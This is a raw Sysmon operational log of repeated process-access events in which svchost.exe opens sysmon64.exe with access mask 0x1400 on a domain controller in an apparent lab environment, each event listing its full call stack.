13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 